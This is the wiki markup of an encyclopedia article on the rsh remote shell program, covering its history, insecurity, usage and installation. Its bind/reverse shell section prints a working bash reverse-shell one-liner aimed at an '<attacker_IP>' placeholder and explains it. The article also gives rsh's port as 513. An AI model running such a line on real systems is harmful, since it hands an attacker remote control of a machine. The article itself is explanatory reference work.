Editing Remote Shell

{{Short description|Command-line program}}
{{refimprove|date=April 2014}}
{{Infobox software
| name                   = remote shell (rsh)
| logo                   = 
| screenshot             = 
| screenshot size        = 
| caption                = 
| developer              = 
| released               = {{Start date and age|1983}}
| latest release version = 
| latest release date    = 
| repo                   = 
| programming language   = [[C (programming language)|C]]
| operating system       = [[Cross-platform]]
| genre                  = 
| license                = 
| website                = 
}}

The '''remote shell''' ('''rsh''') is a [[command-line interface|command-line]] [[computer program]] that can execute [[Command-line interface|shell command]]s as another [[User (computing)|user]], and on another computer across a [[computer network]].

The remote system to which ''rsh'' connects runs the ''rsh'' [[Daemon (computing)|daemon]] (rshd). The daemon typically uses the [[Well-known ports|well-known]] [[Transmission Control Protocol]] (TCP) [[Port (computer networking)|port number]] 513.

==History==
{{Main|Berkeley r-commands}}

''Rsh'' originated as part of the [[Berkeley Software Distribution|BSD Unix]] [[operating system]], along with [[rcp (Unix)|rcp]], as part of the [[rlogin]] package on 4.2BSD in 1983. rsh has since been ported to other operating systems. 

The <code>rsh</code> command has the same name as another common UNIX utility, the [[restricted shell]], which first appeared in [[PWB/UNIX]]; in [[System V|System V Release 4]], the restricted shell is often located at <code>/usr/bin/rsh</code>.

As other [[Berkeley r-commands#Security|Berkeley r-commands]] which involve user authentication, the rsh [[communication protocol|protocol]] is not [[computer security|secure]] for network use, because it sends [[cryptography|unencrypted information]] over the network, among other reasons. Some implementations also [[authentication|authenticate]] by sending unencrypted [[password]]s over the network. rsh has largely been replaced with the [[Secure Shell|secure shell]] (ssh) program, even on local networks.<ref>{{Cite web |title=SSH, the Secure Shell: The Definitive Guide |url=https://www.researchgate.net/publication/234765974 |access-date=2023-11-11 |work=www.researchgate.net |archive-date=2023-11-11 |archive-url=https://web.archive.org/web/20231111073413/https://www.researchgate.net/publication/234765974_SSH_the_Secure_Shell_The_Definitive_Guide |url-status=live }}</ref><ref>{{Cite web |title=Secure Shell Protocol – Everything you need to know |url=https://dev.to/me_jessicahowe/secure-shell-protocol-everything-you-need-to-know-5g5j |access-date=2023-11-11 |work=dev.to}}</ref>

==Example==
As an example of rsh use, the following executes the command ''mkdir testdir'' as user ''remoteuser'' on the computer ''host.example.com'' running a UNIX-like system:

<syntaxhighlight lang="console">
$ rsh -l remoteuser host.example.com "mkdir testdir"
</syntaxhighlight>

After the command has finished rsh terminates. If no command is specified then rsh will log in on the remote system using [[rlogin]]. The network location of the remote computer is looked up using the [[Domain Name System]].

== Installation ==
Command to install rsh client using apt
<syntaxhighlight lang="console">
# apt-get install rsh-redone-client
</syntaxhighlight>

== Bind shell and reverse shell ==
{{See also|Shell shoveling}}
A remote shell session can be initiated by either a local device (which sends commands) or a remote device (on which commands are executed).<ref>{{Cite web|title=Secure Shell (SSH)|url=https://www.techtarget.com/searchsecurity/definition/Secure-Shell|access-date=2023-11-11|work=www.techtarget.com|archive-date=2023-11-11|archive-url=https://web.archive.org/web/20231111073413/https://www.techtarget.com/searchsecurity/definition/Secure-Shell|url-status=live}}</ref> In the first case remote shell will be called bind shell, in the second case - reverse shell.<ref>{{Cite web|title=Difference Between Bind Shell and Reverse Shell|url=https://www.geeksforgeeks.org/difference-between-bind-shell-and-reverse-shell/|access-date=2023-11-11|work=www.geeksforgeeks.org|archive-date=2023-11-11|archive-url=https://web.archive.org/web/20231111073414/https://www.geeksforgeeks.org/difference-between-bind-shell-and-reverse-shell/|url-status=live}}</ref>

Reverse shell can be used when the device on which the command is to be executed is not directly accessible - for example, for remote maintenance of computers located behind NAT that cannot be accessed from the outside. Some exploits create reverse shell from an attacked device back to machines controlled by the attackers (called "reverse shell attack"). The following code demonstrates a reverse shell attack:<ref>{{Cite web |title=What is a Reverse Shell? |url=https://sysdig.com/learn-cloud-native/detection-and-response/what-is-a-reverse-shell/ |access-date=2023-11-28 |website=Sysdig |language=en-US |archive-date=2023-11-28 |archive-url=https://web.archive.org/web/20231128061929/https://sysdig.com/learn-cloud-native/detection-and-response/what-is-a-reverse-shell/ |url-status=live }}</ref>

<syntaxhighlight lang="console">
$ exec 5<>/dev/tcp/<attacker_IP>/80;cat <&5 | while read line; do \$line 2>&5 >&5; done

</syntaxhighlight>It opens a TCP socket to attacker IP at port 80 as a [[file descriptor]]. It then repeatedly read lines from the socket and run the line, piping both [[Standard streams|stdout and stderr]] back to the socket. In other words, it gives the attacker a remote shell on the machine.

==See also==
*[[Berkeley r-commands]]
*[[Secure Shell|secure shell]]

==References==
{{Reflist}}
*[https://web.archive.org/web/20041205190819/http://unixhelp.ed.ac.uk/CGI/man-cgi?rsh rsh - remote shell] - rsh [[man page]].
*{{man|1|rsh|Darwin|remote shell}}

[[Category:Internet protocols]]
[[Category:OS/2 commands]]
[[Category:Unix network-related software]]